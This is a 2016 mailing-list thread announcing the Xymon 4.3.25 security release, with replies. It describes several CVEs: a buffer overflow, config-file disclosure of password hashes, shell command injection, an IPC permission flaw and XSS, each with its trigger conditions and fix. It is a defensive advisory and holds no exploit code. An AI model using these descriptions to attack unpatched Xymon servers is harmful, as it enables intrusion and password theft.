Xymon 4.3.25 - Important Security Update
list Japheth Cleaver
Hello all, Xymon 4.3.25 has been released and is now available for download at https://sourceforge.net/projects/xymon/ Version 4.3.25 includes fixes for several security issues in the server component of the Xymon monitoring system, which are further detailed below. In addition, there are several other feature additions, and several bug fixes and reliability improvements. Full release notes and a Changelog are available at https://sourceforge.net/projects/xymon/files/Xymon/4.3.25/ These issues affect all versions of Xymon 4.3.x prior to 4.3.25, as well as the obsolete 4.1.x and 4.2.x versions. All Xymon users are strongly encouraged to upgrade their server component. We would like to greatly thank Markus Krell for his responsible reporting of these issues and for his assistance in testing their resolution. And as always, thank you to everyone who has contributed code or submitted feature suggestions or bug reports to the Xymon project. Regards, Japheth "J.C." Cleaver Xymon 4.x Maintainer * CVE-2016-2054: Buffer overflow in xymond handling of "config" command: The xymond daemon performs an unchecked copying of a user-supplied filename to a fixed-size buffer when handling a "config" command. This may be used to trigger a buffer overflow in xymond, possibly resulting in remote code execution and/or denial of service of the Xymon monitoring system. This code will run with the privileges of the xymon userid. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the "--status-senders" option (a non-default configuration). This bug has been patched in Xymon 4.3.25. * CVE-2016-2055: Access to possibly confidential files in the Xymon configuration directory: The xymond daemon will allow anyone with network access to the xymond network port (1984) to download configuration files in the Xymon "etc" directory. In a default installation, the Apache htaccess file "xymonpasswd" controlling access to the administrator webpages is installed in this directory and is therefore available for download. The passwords in the file are hashed, but may then be brute-forced off-line. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the "--status-senders" option (a non-default configuration). Administrators of existing installations should ensure that the xymonpasswd file is not readable by the userid running the xymond daemon. Permissions should be: Owner=webserver UID, group=webserver GID, mode rw-rw--- (600). This will be the default configuration starting with Xymon 4.3.25. In addition, the "config" command will only allow access to regular files. By default, only files ending in ".cfg" may be directly retrieved, although this can be overridden by the administrator, and config files may include other files and directories using existing directives. Alternatively, the file may be moved to a location outside the Xymon configuration directory. The Xymon cgioptions.cfg file must then be edited so CGI_USERADM_OPTS and CGI_CHPASSWD_OPTS include "--passwdfile=FILENAME". * CVE-2016-2056: Shell command injection in the "useradm" and "chpasswd" web applications: The useradm and chpasswd web applications may be used to administer passwords for user authentication in Xymon, acting as a web frontend to the Apache "htpasswd" application. The htpasswd command is invoked via a shell command, and it is therefore possible to inject arbitrary commands and have them executed with the privileges of the webserver (CGI) user. This bug can only be triggered by web users with access to the Xymon webpages, who are already authenticated as Xymon users. However, when combined with CVE-2016-xxxx which allows for off-line cracking of password hashes, this bug may be exploitable by others. This bug has been patched in Xymon 4.3.25. * CVE-2016-2057: Incorrect permissions on IPC queues used by the xymond daemon can bypass IP access filtering: An IPC message queue used by the xymon daemon is created with world-write permissions, allowing a local user on the Xymon master server to inject all types of messages into Xymon, bypassing any IP-based access controls. Exploitation of this bug requires local access to the Xymon master server. This bug has been patched in Xymon 4.3.25. * CVE-2016-2058: Javascript injection in "detailed status webpage" of monitoring items: A status-message sent from a Xymon client may contain any data, including HTML, which will be included on the "detailed status" page available via the Xymon status webinterface. A malicious user may send a status message containing custom Javascript code, which will then be rendered in the browser of the user viewing the status page. Exploitation of this bug requires that you can control the contents of a status message sent to Xymon, which is possible if you control one of the servers monitored by Xymon, or the Xymon master server. Also, the bug requires a user to actually view the "detailed status" webpage. This bug has been patched in Xymon 4.3.25 by including a "Content-Security-Policy" HTTP header in the response sent to the browser. This means that older browsers may still be vulnerable to this issue. * CVE-2016-2058: XSS vulnerability via malformed acknowledgment messages: (Note that this uses the same CVE id as the Javascript injection issue) The message sent by a user to indicate acknowledgment of an alert is not HTML-escaped before being displayed on the status webpage, which may be used to trigger a cross-site scripting vulnerability. Exploitation of this bug requires that the attacker is able to acknowledge an alert status. This requires user-authenticated access to the Xymon webpages, or that the user receives a message (usually via e-mail) containing the authentication token for the acknowledgment. This bug has been patched in Xymon 4.3.25.
list Jeremy Laidman
JC Reporting some typos, in case you're republishing these notes: "However, when combined with CVE-2016-xxxx" needs the xxxx updated. "mode rw-rw--- (600)" should be 660. Cheers Jeremy
▸
On Tue, 9 Feb 2016 07:06 J.C. Cleaver <user-87556346d4af@xymon.invalid> wrote:
Hello all, Xymon 4.3.25 has been released and is now available for download at https://sourceforge.net/projects/xymon/ Version 4.3.25 includes fixes for several security issues in the server component of the Xymon monitoring system, which are further detailed below. In addition, there are several other feature additions, and several bug fixes and reliability improvements. Full release notes and a Changelog are available at https://sourceforge.net/projects/xymon/files/Xymon/4.3.25/ These issues affect all versions of Xymon 4.3.x prior to 4.3.25, as well as the obsolete 4.1.x and 4.2.x versions. All Xymon users are strongly encouraged to upgrade their server component. We would like to greatly thank Markus Krell for his responsible reporting of these issues and for his assistance in testing their resolution. And as always, thank you to everyone who has contributed code or submitted feature suggestions or bug reports to the Xymon project. Regards, Japheth "J.C." Cleaver Xymon 4.x Maintainer * CVE-2016-2054: Buffer overflow in xymond handling of "config" command: The xymond daemon performs an unchecked copying of a user-supplied filename to a fixed-size buffer when handling a "config" command. This may be used to trigger a buffer overflow in xymond, possibly resulting in remote code execution and/or denial of service of the Xymon monitoring system. This code will run with the privileges of the xymon userid. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the "--status-senders" option (a non-default configuration). This bug has been patched in Xymon 4.3.25. * CVE-2016-2055: Access to possibly confidential files in the Xymon configuration directory: The xymond daemon will allow anyone with network access to the xymond network port (1984) to download configuration files in the Xymon "etc" directory. In a default installation, the Apache htaccess file "xymonpasswd" controlling access to the administrator webpages is installed in this directory and is therefore available for download. The passwords in the file are hashed, but may then be brute-forced off-line. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the "--status-senders" option (a non-default configuration). Administrators of existing installations should ensure that the xymonpasswd file is not readable by the userid running the xymond daemon. Permissions should be: Owner=webserver UID, group=webserver GID, mode rw-rw--- (600). This will be the default configuration starting with Xymon 4.3.25. In addition, the "config" command will only allow access to regular files. By default, only files ending in ".cfg" may be directly retrieved, although this can be overridden by the administrator, and config files may include other files and directories using existing directives. Alternatively, the file may be moved to a location outside the Xymon configuration directory. The Xymon cgioptions.cfg file must then be edited so CGI_USERADM_OPTS and CGI_CHPASSWD_OPTS include "--passwdfile=FILENAME". * CVE-2016-2056: Shell command injection in the "useradm" and "chpasswd" web applications: The useradm and chpasswd web applications may be used to administer passwords for user authentication in Xymon, acting as a web frontend to the Apache "htpasswd" application. The htpasswd command is invoked via a shell command, and it is therefore possible to inject arbitrary commands and have them executed with the privileges of the webserver (CGI) user. This bug can only be triggered by web users with access to the Xymon webpages, who are already authenticated as Xymon users. However, when combined with CVE-2016-xxxx which allows for off-line cracking of password hashes, this bug may be exploitable by others. This bug has been patched in Xymon 4.3.25. * CVE-2016-2057: Incorrect permissions on IPC queues used by the xymond daemon can bypass IP access filtering: An IPC message queue used by the xymon daemon is created with world-write permissions, allowing a local user on the Xymon master server to inject all types of messages into Xymon, bypassing any IP-based access controls. Exploitation of this bug requires local access to the Xymon master server. This bug has been patched in Xymon 4.3.25. * CVE-2016-2058: Javascript injection in "detailed status webpage" of monitoring items: A status-message sent from a Xymon client may contain any data, including HTML, which will be included on the "detailed status" page available via the Xymon status webinterface. A malicious user may send a status message containing custom Javascript code, which will then be rendered in the browser of the user viewing the status page. Exploitation of this bug requires that you can control the contents of a status message sent to Xymon, which is possible if you control one of the servers monitored by Xymon, or the Xymon master server. Also, the bug requires a user to actually view the "detailed status" webpage. This bug has been patched in Xymon 4.3.25 by including a "Content-Security-Policy" HTTP header in the response sent to the browser. This means that older browsers may still be vulnerable to this issue. * CVE-2016-2058: XSS vulnerability via malformed acknowledgment messages: (Note that this uses the same CVE id as the Javascript injection issue) The message sent by a user to indicate acknowledgment of an alert is not HTML-escaped before being displayed on the status webpage, which may be used to trigger a cross-site scripting vulnerability. Exploitation of this bug requires that the attacker is able to acknowledge an alert status. This requires user-authenticated access to the Xymon webpages, or that the user receives a message (usually via e-mail) containing the authentication token for the acknowledgment. This bug has been patched in Xymon 4.3.25.
list Japheth Cleaver
Hello all, The Terabithia RPM release of Xymon has been updated to 4.3.25. In addition to the 4.3.25 fixes detailed in the release notes, the RPM includes a fix for a separate, unrelated, buffer overflow issue which could allow a remote user to crash the server, or potentially execute arbitrary code by sending a specially crafted message. This issue did not affect any normal release version of Xymon 4.3.x or below. Thank you to Matt Vander Werf for his report, and his assistance in validating its resolution. All users are urged to upgrade to the latest RPM version, 4.3.25-1 or higher. Regards, -jc
list Ryan Novosielski
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
▸
On 02/08/2016 03:06 PM, J.C. Cleaver wrote:Hello all, Xymon 4.3.25 has been released and is now available for download at https://sourceforge.net/projects/xymon/ Version 4.3.25 includes fixes for several security issues in the server component of the Xymon monitoring system, which are further detailed below. In addition, there are several other feature additions, and several bug fixes and reliability improvements. Full release notes and a Changelog are available at https://sourceforge.net/projects/xymon/files/Xymon/4.3.25/ These issues affect all versions of Xymon 4.3.x prior to 4.3.25, as well as the obsolete 4.1.x and 4.2.x versions. All Xymon users are strongly encouraged to upgrade their server component. We would like to greatly thank Markus Krell for his responsible reporting of these issues and for his assistance in testing their resolution. And as always, thank you to everyone who has contributed code or submitted feature suggestions or bug reports to the Xymon project. Regards, Japheth "J.C." Cleaver Xymon 4.x Maintainer * CVE-2016-2054: Buffer overflow in xymond handling of "config" command: The xymond daemon performs an unchecked copying of a user-supplied filename to a fixed-size buffer when handling a "config" command. This may be used to trigger a buffer overflow in xymond, possibly resulting in remote code execution and/or denial of service of the Xymon monitoring system. This code will run with the privileges of the xymon userid. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the "--status-senders" option (a non-default configuration). This bug has been patched in Xymon 4.3.25. * CVE-2016-2055: Access to possibly confidential files in the Xymon configuration directory: The xymond daemon will allow anyone with network access to the xymond network port (1984) to download configuration files in the Xymon "etc" directory. In a default installation, the Apache htaccess file "xymonpasswd" controlling access to the administrator webpages is installed in this directory and is therefore available for download. The passwords in the file are hashed, but may then be brute-forced off-line. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the "--status-senders" option (a non-default configuration). Administrators of existing installations should ensure that the xymonpasswd file is not readable by the userid running the xymond daemon. Permissions should be: Owner=webserver UID, group=webserver GID, mode rw-rw--- (600). This will be the default configuration starting with Xymon 4.3.25. In addition, the "config" command will only allow access to regular files. By default, only files ending in ".cfg" may be directly retrieved, although this can be overridden by the administrator, and config files may include other files and directories using existing directives. Alternatively, the file may be moved to a location outside the Xymon configuration directory. The Xymon cgioptions.cfg file must then be edited so CGI_USERADM_OPTS and CGI_CHPASSWD_OPTS include "--passwdfile=FILENAME". * CVE-2016-2056: Shell command injection in the "useradm" and "chpasswd" web applications: The useradm and chpasswd web applications may be used to administer passwords for user authentication in Xymon, acting as a web frontend to the Apache "htpasswd" application. The htpasswd command is invoked via a shell command, and it is therefore possible to inject arbitrary commands and have them executed with the privileges of the webserver (CGI) user. This bug can only be triggered by web users with access to the Xymon webpages, who are already authenticated as Xymon users. However, when combined with CVE-2016-xxxx which allows for off-line cracking of password hashes, this bug may be exploitable by others. This bug has been patched in Xymon 4.3.25. * CVE-2016-2057: Incorrect permissions on IPC queues used by the xymond daemon can bypass IP access filtering: An IPC message queue used by the xymon daemon is created with world-write permissions, allowing a local user on the Xymon master server to inject all types of messages into Xymon, bypassing any IP-based access controls. Exploitation of this bug requires local access to the Xymon master server. This bug has been patched in Xymon 4.3.25. * CVE-2016-2058: Javascript injection in "detailed status webpage" of monitoring items: A status-message sent from a Xymon client may contain any data, including HTML, which will be included on the "detailed status" page available via the Xymon status webinterface. A malicious user may send a status message containing custom Javascript code, which will then be rendered in the browser of the user viewing the status page. Exploitation of this bug requires that you can control the contents of a status message sent to Xymon, which is possible if you control one of the servers monitored by Xymon, or the Xymon master server. Also, the bug requires a user to actually view the "detailed status" webpage. This bug has been patched in Xymon 4.3.25 by including a "Content-Security-Policy" HTTP header in the response sent to the browser. This means that older browsers may still be vulnerable to this issue. * CVE-2016-2058: XSS vulnerability via malformed acknowledgment messages: (Note that this uses the same CVE id as the Javascript injection issue) The message sent by a user to indicate acknowledgment of an alert is not HTML-escaped before being displayed on the status webpage, which may be used to trigger a cross-site scripting vulnerability. Exploitation of this bug requires that the attacker is able to acknowledge an alert status. This requires user-authenticated access to the Xymon webpages, or that the user receives a message (usually via e-mail) containing the authentication token for the acknowledgment. This bug has been patched in Xymon 4.3.25.
Am I right that:
A) The critical component to upgrade here is the server running the
Xymon display (less so the xymonnnet machines, if any) and...
B) A Xymon 4.3.12 xymonnet machine will operate correctly with a Xymon
4.3.25 server that is receiving the status messages and generating the
web pages?
- --
____ *Note: UMDNJ is now Rutgers-Biomedical and Health Sciences*
|| \\UTGERS |---------------------*O*---------------------
||_// Biomedical | Ryan Novosielski - Senior Technologist
|| \\ and Health | user-46c89e614701@xymon.invalid - 973/972.0922 (2x0922)
|| \\ Sciences | OIRT/High Perf & Res Comp - MSB C630, Newark
`'
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iEYEARECAAYFAla6Wb0ACgkQmb+gadEcsb7GegCgqX983qASNujrb8OW06n40Hl1
9qQAn2czgGOtofCytGWp9lqek36XRCBD
=eld7
-----END PGP SIGNATURE-----
list Japheth Cleaver
▸
On Tue, February 9, 2016 1:27 pm, Ryan Novosielski wrote:
Am I right that: A) The critical component to upgrade here is the server running the Xymon display (less so the xymonnnet machines, if any) and... B) A Xymon 4.3.12 xymonnet machine will operate correctly with a Xymon 4.3.25 server that is receiving the status messages and generating the web pages?
A) The most critical items are the CGI directory, correct. Typically
that's your Xymon display server, although strictly speaking it's possible
to have xymongen + page output, CGI scripts, and xymond on three different
servers.
If you can't update your core xymond server at this time, you should
validate the permissions on all files in your $XYMONHOME/etc/ directory to
ensure the user xymond is running as doesn't have read access to anything
it shouldn't.
B) Correct. You should be fine going from 4.3.12 reporting to a 4.3.25.
The reverse (new xymonnet to 4.3.12 xymond) won't work due to the new
extcombo format not being understood.
Regards,
-jc